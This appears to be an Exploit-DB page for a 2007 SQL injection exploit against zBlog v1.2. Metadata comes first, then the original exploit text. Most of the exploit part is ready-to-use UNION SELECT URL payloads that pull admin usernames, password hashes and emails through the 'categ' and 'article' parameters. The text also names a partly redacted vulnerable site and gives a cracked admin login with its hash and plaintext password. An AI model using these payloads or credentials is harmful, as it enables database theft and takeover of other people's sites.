zBlog v1.2 Remote SQL Injection Exploit

vendor:

zBlog

by:

H-T Team (HouSSamix, ToXiC350, CoNaN)

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: zBlog

Affected Version From: zBlog v1.2

Affected Version To: zBlog v1.2

Patch Exists: NO

Related CWE:

CPE: a:zblog:zblog:1.2

Metasploit:

Other Scripts:

Platforms Tested: Not specified

2007

zBlog v1.2 Remote SQL Injection Exploit

This exploit allows an attacker to perform a remote SQL injection attack on zBlog v1.2. By manipulating the 'page' parameter in the URL, an attacker can inject SQL commands and retrieve sensitive information from the database, such as admin credentials. The vulnerability exists in the 'categ' and 'article' parameters.

Mitigation:

The vendor has not provided a patch for this vulnerability. However, users are advised to upgrade to a newer version of zBlog that does not have this vulnerability.

Source

Exploit-DB raw data:

#########################################################################
            zBlog v1.2  Remote SQL Injection Exploit
#########################################################################


## AUTHOR     : H-T Team ( HouSSamix _ ToXiC350 _ CoNaN )
## HOME     : http://no-hack.net

## Script         : zBlog
## Version    : 1.2 
## Site         : http://kaxz01.free.fr/
## Download    : http://kaxz01.free.fr/fichiers/zBlog.zip

## EXPLOITS :

[1]
http://server.com/Path/index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20[table prefix]_admins--
[2]
http://server.com/Path/index.php?page=articles&article=-1%20union%20select%201,pseudo_admin,3,motdepasse_admin,5,6,7,8,9,10,11,12,13,14,15,16,17,email_admin%20from%20[table prefix]_admins--

[table prefix] = by default it is zblog

ex : http://Site.com/zBlog/index.php?page=articles&article=-1%20union%20select%201,pseudo_admin,3,motdepasse_admin,5,6,7,8,9,10,11,12,13,14,15,16,17,email_admin%20from%20zblog_admins--

## Note
admin login is at /admin/

## GREETZ  :  RoMaNcYxHaCkEr , Mahmood_Ali , C_m  and all musulmans hackers

#########################################################################
            zBlog v1.2 Remote SQL Injection Exploit
#########################################################################

exemple of site vulnerable

http://www.xxx.org/zblog/index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20zblog_admins--


account admin with password md5 cracked

user >> Selim
pass >> 6a81060b83b919bc115112bf840eca63 = miles

# milw0rm.com [2007-12-22]